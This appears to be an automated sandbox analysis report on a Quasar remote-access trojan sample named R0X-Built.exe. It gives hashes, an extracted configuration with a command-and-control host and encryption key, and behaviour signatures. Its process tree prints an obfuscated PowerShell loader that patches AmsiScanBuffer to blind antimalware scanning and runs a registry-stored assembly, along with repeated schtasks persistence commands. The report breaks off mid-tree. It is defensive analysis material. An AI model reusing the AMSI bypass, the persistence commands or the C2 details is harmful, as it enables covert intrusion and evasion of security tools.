Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-05-2024 06:27

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a4a9308ce3b465b6b2dccb94b86d8a83

  • SHA1

    7e594db5d7adbffa0ca6cadad7a8b037156d90cc

  • SHA256

    98bbe270ca87c08856cc3dceafef76824baa96fe031d7f00f0517b2fd898e117

  • SHA512

    393af569d8d3cbe2a12fe0c938ccd15ff2247cd1e916de71b8567cb0beb7aa93991735baf9e00db657fa626e797a70699f290a96405a8abf03c3bb24e25f977b

  • SSDEEP

    12288:bpiREGJofVF99JK03/Mi57Ey6srDZkRYjT5+Mn2FyaZs:1wpJy9JK0PMi5oivSdi

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

looking-memphis.gl.at.ply.gg:45119:41251

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    740ewEJmzLdsHQMggIQI

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 11 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 37 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 16 IoCs
  • Runs ping.exe 1 TTPs 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1c06a4a9-299a-421b-b111-ee2680830265}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3876
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:660
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:388
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1016
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1076
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1084
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1140
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2796
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yRbqKxkBLBGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kIKZcIrBLDkUap,[Parameter(Position=1)][Type]$EvpYPqGOXT)$mjrbchkXwDT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'elega'+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+'i'+'c'+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+'e'+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$mjrbchkXwDT.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+[Char](105)+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kIKZcIrBLDkUap).SetImplementationFlags('R'+'u'+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'ed');$mjrbchkXwDT.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+'w'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+'a'+'l',$EvpYPqGOXT,$kIKZcIrBLDkUap).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $mjrbchkXwDT.CreateType();}$iBRONsafTUFNY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+''+'m'+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+'ro'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'Un'+'s'+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+'o'+''+'d'+''+[Char](115)+'');$oJJvAUUYwDZIGg=$iBRONsafTUFNY.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JtaKoZFxsTBsaboEPKR=yRbqKxkBLBGC @([String])([IntPtr]);$BAWYDgRSqOeQXiSEsdcYBc=yRbqKxkBLBGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gZeJXyUFPmq=$iBRONsafTUFNY.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$eyyMjRhtzeWSzu=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'bra'+[Char](114)+''+'y'+''+[Char](65)+'')));$VDdYqysrBlgErsvzZ=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$gZeJXyUFPmq,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+'o'+[Char](116)+''+'e'+'c'+[Char](116)+'')));$lowLnOk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eyyMjRhtzeWSzu,$JtaKoZFxsTBsaboEPKR).Invoke(''+[Char](97)+'m'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$iWGxsNEFnnKyakdnz=$oJJvAUUYwDZIGg.Invoke($Null,@([Object]$lowLnOk,[Object]('A'+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$YXgOTalXiY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,4,[ref]$YXgOTalXiY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iWGxsNEFnnKyakdnz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VDdYqysrBlgErsvzZ,$BAWYDgRSqOeQXiSEsdcYBc).Invoke($iWGxsNEFnnKyakdnz,[uint32]8,0x20,[ref]$YXgOTalXiY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+'$'+'7'+'7'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1964
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1164
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1264
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1304
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1320
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1388
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1428
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2644
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1508
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1520
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1628
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1708
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1752
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1772
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1864
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1976
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:2036
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2040
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1648
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1652
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2132
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2204
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2240
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2436
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2444
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2652
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2748
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2768
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2828
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2860
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2872
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2984
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3080
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3460
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3540
                                                                                  • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2816
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2908
                                                                                    • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                      "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4788
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:1480
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GYL8qXV3KIzo.bat" "
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4884
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:2572
                                                                                          • C:\Windows\SysWOW64\chcp.com
                                                                                            chcp 65001
                                                                                            5⤵
                                                                                              PID:4804
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping -n 10 localhost
                                                                                              5⤵
                                                                                              • Runs ping.exe
                                                                                              PID:2540
                                                                                            • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                              "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                              5⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in System32 directory
                                                                                              PID:2012
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                6⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:4888
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSQnNVHahbdP.bat" "
                                                                                                6⤵
                                                                                                  PID:732
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                      PID:4736
                                                                                                    • C:\Windows\SysWOW64\chcp.com
                                                                                                      chcp 65001
                                                                                                      7⤵
                                                                                                        PID:8
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        7⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:1988
                                                                                                      • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                        "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                        7⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in System32 directory
                                                                                                        PID:3568
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                          8⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4080
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            9⤵
                                                                                                              PID:3076
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qTabHFmwxCQs.bat" "
                                                                                                            8⤵
                                                                                                              PID:540
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                9⤵
                                                                                                                  PID:3872
                                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                                  chcp 65001
                                                                                                                  9⤵
                                                                                                                    PID:2760
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping -n 10 localhost
                                                                                                                    9⤵
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:4644
                                                                                                                  • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                    "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                                    9⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    PID:3212
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                                      10⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2376
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        11⤵
                                                                                                                          PID:2172
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ritNxtEkOTZf.bat" "
                                                                                                                        10⤵
                                                                                                                          PID:3616
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            11⤵
                                                                                                                              PID:4808
                                                                                                                            • C:\Windows\SysWOW64\chcp.com
                                                                                                                              chcp 65001
                                                                                                                              11⤵
                                                                                                                                PID:1892
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping -n 10 localhost
                                                                                                                                11⤵
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:3208
                                                                                                                              • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                                "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                                                11⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in System32 directory
                                                                                                                                PID:3300
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                                                  12⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4036
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    13⤵
                                                                                                                                      PID:4056
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C8El6LET7fd1.bat" "
                                                                                                                                    12⤵
                                                                                                                                      PID:2108
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        13⤵
                                                                                                                                          PID:2940
                                                                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          13⤵
                                                                                                                                            PID:5012
                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            13⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:3360
                                                                                                                                          • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                                            "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                                                            13⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            PID:972
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                                                              14⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:2952
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S26TRUWfVEBU.bat" "
                                                                                                                                              14⤵
                                                                                                                                                PID:2416
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  15⤵
                                                                                                                                                    PID:3340
                                                                                                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                    chcp 65001
                                                                                                                                                    15⤵
                                                                                                                                                      PID:1476
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping -n 10 localhost
                                                                                                                                                      15⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:1420
                                                                                                                                                    • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                                                      "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                                                                      15⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      PID:2468
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                                                                        16⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:4952
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          17⤵
                                                                                                                                                            PID:244
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQpN0RDmDpq2.bat" "
                                                                                                                                                          16⤵
                                                                                                                                                            PID:1452
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              17⤵
                                                                                                                                                                PID:4316
                                                                                                                                                              • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                chcp 65001
                                                                                                                                                                17⤵
                                                                                                                                                                  PID:2288
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping -n 10 localhost
                                                                                                                                                                  17⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:4564
                                                                                                                                                                • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                                                                  "C:\Windows\SysWOW64\Windows\$srr-powershell.exe"
                                                                                                                                                                  17⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  PID:1056
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                                                                                    18⤵
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:1456
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      19⤵
                                                                                                                                                                        PID:2508
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W1NxpLyUDbI2.bat" "
